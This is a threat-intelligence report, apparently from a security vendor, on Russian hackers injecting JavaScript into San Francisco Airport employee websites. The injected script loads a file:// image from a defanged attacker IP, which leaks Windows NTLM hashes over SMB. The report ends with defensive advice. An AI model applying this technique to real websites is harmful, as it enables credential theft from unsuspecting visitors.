Latest Threat Research: LetMeowIn – Analysis of a Credential Dumper

Get Informed

Search

Russian Threat Group Breach San Francisco Airport to Steal Employee Accounts

Dragonfly/Energetic Bear: Bleeping computer originally reported that it was believed Russian hackers were behind a breach at the San Francisco Airport in March, but at the time of the report, it was not known how employee credentials had been stolen. Now, according to researchers at ESET, they believe they have found the way that the group managed to steal credentials from the employees. The attackers managed to breach the San Francisco Airport (SFO) employee websites SFOconnect[dot]com and SFOConstruction[dot]com. After the intrusion, the threat actors added JavaScript which injects a 1×1 pixel image into the HTML of the websites. The source for the image used the “file://” protocol followed by the remote site that the file will be downloaded from (51.159.28[.]101/icon.png). When a Windows web browser attempts to load a file referenced that way, it uses the SMB file-sharing protocol, which by default will send the user’s Windows account name and hashed password during NTLM authentication with the remote server. Since the attackers have control over the remote server, they can steal the credentials and crack them to recover passwords or use them in a pass-the-hash attack to login to the victim company’s Windows network.

Analyst Notes

This attack is hard to identify for employees because they never see the download or take any action other than visiting the employee website to have their credentials stolen. In this case, the attackers leveraged a default setting of sending the username and hashed password to a server. It is a best practice for organizations to change the settings of Windows workstations to not send credentials to remote SMB servers, or block SMB network traffic from leaving the corporate network perimeter. Because the threat actor compromised the employee websites, it would make it harder for employees to identify if their passwords were stolen in the attack. Since it is hard to identify who may have been impacted, anyone that went to those websites should change their Windows account password. Because employee passwords can be stolen or guessed, it is important to implement Multi-Factor Authentication (MFA) to protect accounts from unauthorized access even if an attacker has a password. It is also critical to monitor systems that can be remotely accessed for early signs of attacker behaviors, regardless of the method used. Endpoint Detection and Response (EDR) tools help security analysts detect suspicious behaviors on workstations and servers to stop attacks in the early stages.
More information on this attack can be found here: https://www.bleepingcomputer.com/news/security/russian-hackers-tried-to-steal-san-francisco-airport-windows-accounts/